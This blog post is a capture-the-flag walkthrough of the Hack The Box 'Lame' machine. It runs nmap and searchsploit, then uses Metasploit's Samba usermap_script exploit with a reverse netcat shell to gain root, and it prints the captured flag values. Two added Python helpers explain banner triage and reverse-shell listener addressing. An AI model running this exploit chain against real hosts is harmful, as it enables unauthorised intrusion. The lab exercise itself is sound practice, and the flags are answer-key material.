mizuiro_rivi’s diary

A blog chronicling daily life

Lame Hack-the-box

tags: hack the box linux penetration testing
# Nmap 7.91 scan initiated Fri Mar 18 11:53:06 2022 as: nmap -sV -sC -A -oN 10.10.10.3.txt 10.10.10.3
Nmap scan report for 10.10.10.3
Host is up (0.37s latency).
Not shown: 996 filtered ports
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.16.5
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: DD-WRT v24-sp1 (Linux 2.4.36) (92%), OpenWrt White Russian 0.9 (Linux 2.4.30) (92%), Linux 2.6.23 (92%), Arris TG862G/CT cable modem (92%), Belkin N300 WAP (Linux 2.6.30) (92%), Control4 HC-300 home controller (92%), D-Link DAP-1522 WAP, or Xerox WorkCentre Pro 245 or 6556 printer (92%), Dell Integrated Remote Access Controller (iDRAC6) (92%), Linksys WET54GS5 WAP, Tranzeo TR-CPQ-19f WAP, or Xerox WorkCentre Pro 265 printer (92%), Linux 2.4.21 - 2.4.31 (likely embedded) (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 2h00m20s, deviation: 2h49m43s, median: 19s
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name: 
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2022-03-18T11:54:06-04:00
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE (using port 22/tcp)
HOP RTT       ADDRESS
1   211.72 ms 10.10.16.1
2   426.18 ms 10.10.10.3

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Mar 18 11:54:28 2022 -- 1 IP address (1 host up) scanned in 81.84 seconds

Scanning with nmap shows that Samba version 3.0.20 is running.

└─$ searchsploit Samba 3.0.20                                                 1 ⚙
------------------------------------------------ ---------------------------------
 Exploit Title                                  |  Path
------------------------------------------------ ---------------------------------
Samba 3.0.10 < 3.3.5 - Format String / Security | multiple/remote/10095.txt
Samba 3.0.20 < 3.0.25rc3 - 'Username' map scrip | unix/remote/16320.rb
Samba < 3.0.20 - Remote Heap Overflow           | linux/remote/7701.txt
Samba < 3.0.20 - Remote Heap Overflow           | linux/remote/7701.txt
Samba < 3.6.2 (x86) - Denial of Service (PoC)   | linux_x86/dos/36741.py
------------------------------------------------ ---------------------------------
Shellcodes: No Results

Searching for exploits turned up "Samba 3.0.20 < 3.0.25rc3 - 'Username' map script", so I'll try whether it works.
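Before reaching for Metasploit, the same nmap banner can be triaged automatically. The following is an added example, not code from the original post: it parses the PORT lines of an `nmap -oN` report (a constructed excerpt of the scan above), turns version strings such as `3.0.20-Debian` or `3.0.25rc3` into comparable tuples, and flags any open service whose version falls inside a constructed advisory table that mirrors the searchsploit titles above. The regexes, the `ADVISORIES` table and the `triage` function are all assumptions of this example; the vague `3.X - 4.X` banner on port 139 is deliberately skipped rather than guessed at.

```python
import re

# Constructed sample: the PORT lines of the nmap -oN report above,
# in the same column layout nmap prints.
SAMPLE_NMAP = """\
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
"""

# One PORT line: port/proto, state, service, then the free-form version column.
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
# Numeric version with an optional release-candidate suffix ("3.0.25rc3").
VERSION_RE = re.compile(r"(\d+(?:\.\d+)+)(?:rc(\d+))?")

# Constructed advisory table mirroring the searchsploit titles:
# (service keyword, low bound inclusive, high bound exclusive, label).
ADVISORIES = [
    ("samba", None, "3.0.20", "Samba < 3.0.20 - Remote Heap Overflow"),
    ("samba", "3.0.20", "3.0.25rc3", "Samba 3.0.20 < 3.0.25rc3 - 'Username' map script"),
]


def parse_ports(report):
    """Return (port, proto, state, service, version_string) for every PORT line."""
    rows = []
    for line in report.splitlines():
        m = PORT_RE.match(line)
        if m:
            port, proto, state, service, version = m.groups()
            rows.append((int(port), proto, state, service, version.strip()))
    return rows


def version_key(text):
    """Map '3.0.20-Debian' / '3.0.25rc3' to a comparable tuple.

    A release candidate sorts before the final release of the same number:
    rc3 -> (..., 0, 3), final -> (..., 1, 0).  Returns None when no numeric
    version is present (e.g. 'Samba smbd 3.X - 4.X')."""
    m = VERSION_RE.search(text)
    if not m:
        return None
    nums = tuple(int(x) for x in m.group(1).split("."))
    rc = m.group(2)
    return nums + ((0, int(rc)) if rc else (1, 0))


def in_range(v, low, high):
    """Inclusive low bound, exclusive high bound; None means unbounded."""
    if low is not None and v < version_key(low):
        return False
    if high is not None and v >= version_key(high):
        return False
    return True


def triage(report, advisories=ADVISORIES):
    """Return [(port, version_string, label)] for each open banner inside an advisory range."""
    hits = []
    for port, _proto, state, _service, version in parse_ports(report):
        if state != "open":
            continue
        v = version_key(version)
        if v is None:
            continue  # banner too vague to compare; needs a follow-up probe, not a guess
        for keyword, low, high, label in advisories:
            if keyword in version.lower() and in_range(v, low, high):
                hits.append((port, version, label))
    return hits


if __name__ == "__main__":
    for port, version, label in triage(SAMPLE_NMAP):
        print(f"{port}/tcp: {version!r} matches {label}")
```

Run against the sample, only port 445 is reported, and only against the second advisory: `3.0.20` is below the exclusive `< 3.0.20` bound of the heap-overflow entry and inside the `3.0.20 <= v < 3.0.25rc3` window of the username-map-script entry. The rc handling matters here because `3.0.25rc3` is older than `3.0.25`, so a plain string comparison would draw the boundary in the wrong place.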

└─$ msfconsole                                                                   1 ⚙
[!] The following modules were loaded with warnings:
                                                  

 ______________________________________________________________________________
|                                                                              |
|                          3Kom SuperHack II Logon                             |
|______________________________________________________________________________|
|                                                                              |
|                                                                              |
|                                                                              |
|                 User Name:          [   security    ]                        |
|                                                                              |
|                 Password:           [               ]                        |
|                                                                              |
|                                                                              |
|                                                                              |
|                                   [ OK ]                                     |
|______________________________________________________________________________|
|                                                                              |
|                                                       https://metasploit.com |
|______________________________________________________________________________|


       =[ metasploit v6.1.32-dev                          ]
+ -- --=[ 2206 exploits - 1168 auxiliary - 395 post       ]
+ -- --=[ 596 payloads - 45 encoders - 11 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Adapter names can be used for IP params 
set LHOST eth0

msf6 > search samba 3.0.20

Matching Modules
================

   #  Name                                Disclosure Date  Rank       Check  Description
   -  ----                                ---------------  ----       -----  -----------
   0  exploit/multi/samba/usermap_script  2007-05-14       excellent  No     Samba "username map script" Command Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/samba/usermap_script  

There is exploit/multi/samba/usermap_script, so I'll try using it.

msf6 > use exploit/multi/samba/usermap_script
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(multi/samba/usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), see https://github.com/ra
                                      pid7/metasploit-framework/wiki/Using-Metasplo
                                      it
   RPORT   139              yes       The target port (TCP)


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.0.2.15        yes       The listen address (an interface may be specif
                                     ied)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic

Looking at the options, RHOSTS needs to be set to specify the target host.

Also, since the payload is reverse_netcat, I think it runs a reverse shell.

The listener side can be set with LHOST.

Since I'm accessing the target through the VPN, do I have to set LHOST to the inet address of the VPN interface? (Why?)

3: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 500
    link/none 
    inet 10.10.16.5/23 scope global tun0
       valid_lft forever preferred_lft forever
    inet6 dead:beef:4::1003/64 scope global 
       valid_lft forever preferred_lft forever
    inet6 fe80::e799:9d19:158c:faac/64 scope link stable-privacy 
       valid_lft forever preferred_lft forever
msf6 exploit(multi/samba/usermap_script) > set LHOST 10.10.16.5
LHOST => 10.10.16.5
msf6 exploit(multi/samba/usermap_script) > set RhOSTS 10.10.10.3
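The reason tun0's address is the right LHOST: a reverse shell is a TCP connection the target opens back to LHOST:LPORT, so LHOST must be an address the target can actually route to. The default 10.0.2.15 is the VM's NAT-side address, which nothing outside the VM's host can reach; 10.10.16.5 is the address this machine holds on the VPN, and the lab network is reached over that same tunnel, so the callback simply travels the tunnel in reverse. The kernel makes the same decision when it picks a source address for outbound packets. The following is an added example, not part of the original post: a longest-prefix-match lookup over a constructed routing table (the route entries and the `pick_lhost`/`check_lhost` helpers are assumptions of this example, modelled on the `ip a` output above, with 10.0.2.15 on a hypothetical NAT adapter `eth0`).

```python
import ipaddress

# Constructed routing table for the attacking VM, in the spirit of `ip route`:
# (destination network, interface).  The 10.10.10.0/23 entry stands in for
# whatever lab route the VPN pushes; the exact prefix is an assumption.
ROUTES = [
    ("0.0.0.0/0", "eth0"),       # default route via the NAT gateway
    ("10.0.2.0/24", "eth0"),     # the NAT adapter's own subnet
    ("10.10.10.0/23", "tun0"),   # lab network reached through the VPN tunnel
    ("10.10.16.0/23", "tun0"),   # the tunnel's own subnet (inet 10.10.16.5/23 above)
]

# Address each interface holds (eth0 value is the default LHOST Metasploit printed).
ADDRESSES = {"eth0": "10.0.2.15", "tun0": "10.10.16.5"}


def pick_lhost(target, routes=ROUTES, addresses=ADDRESSES):
    """Longest-prefix match: return (interface, source address) used to reach target.

    This is the address a listener must bind for the target's callback to have a
    routable destination, because the reverse connection follows the same path."""
    t = ipaddress.ip_address(target)
    best_net, best_iface = None, None
    for net, iface in routes:
        n = ipaddress.ip_network(net)
        if t in n and (best_net is None or n.prefixlen > best_net.prefixlen):
            best_net, best_iface = n, iface
    if best_iface is None:
        raise ValueError(f"no route to {target}")
    return best_iface, addresses[best_iface]


def check_lhost(lhost, target, routes=ROUTES, addresses=ADDRESSES):
    """Return (ok, reason): ok is True only when lhost sits on the interface that
    carries traffic to target; any other address is unreachable from the target."""
    iface, expected = pick_lhost(target, routes, addresses)
    if lhost == expected:
        return True, f"{lhost} is the {iface} address on the path to {target}"
    return False, f"{lhost} is not on {iface}, the interface facing {target}; use {expected}"


if __name__ == "__main__":
    print(pick_lhost("10.10.10.3"))              # ('tun0', '10.10.16.5')
    print(check_lhost("10.0.2.15", "10.10.10.3"))
    print(check_lhost("10.10.16.5", "10.10.10.3"))
```

On a real Linux host, `ip route get 10.10.10.3` prints the same decision (the `dev` and `src` fields) without any modelling. From the defender's side the same fact is what makes such sessions visible: the Samba daemon on the server opening an outbound TCP connection to an address in the VPN client pool is exactly the kind of egress a host firewall or NetFlow alert should catch.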

Now actually run the exploit.

msf6 exploit(multi/samba/usermap_script) > exploit

[*] Started reverse TCP handler on 10.10.16.5:4444 
[*] Command shell session 1 opened (10.10.16.5:4444 -> 10.10.10.3:47875 ) at 2022-03-18 14:05:32 -0400

ls
bin
boot
cdrom
dev
etc
home
initrd
initrd.img
initrd.img.old
lib
lost+found
media
mnt
nohup.out
opt
proc
root
sbin
srv
sys
tmp
usr
var
vmlinuz
vmlinuz.old
id
uid=0(root) gid=0(root)

We have root access, so that's a relief.

Let's look for root.txt.

root@lame:/# find / | grep -e 'root\.txt'
find / | grep -e 'root\.txt'
/root/root.txt
root@lame:/# cat /root/root.txt
cat /root/root.txt
88307a9edf8ed976de2ff8c6c98aa5e

Got root.txt!!

Let's look for user.txt too.

find / | grep -e 'user\.txt'
/home/makis/user.txt
/usr/share/doc/fontconfig-config/fontconfig-user.txt.gz
cat /home/makis/user.txt
afc12323eec3ad3d84b9595ae583bd6e

Got it without trouble.

Summary

Since this was my first Hack The Box, I didn't know where to start, so I followed a writeup on YouTube.

I'd like to take this as an opportunity to solve one Machine a day.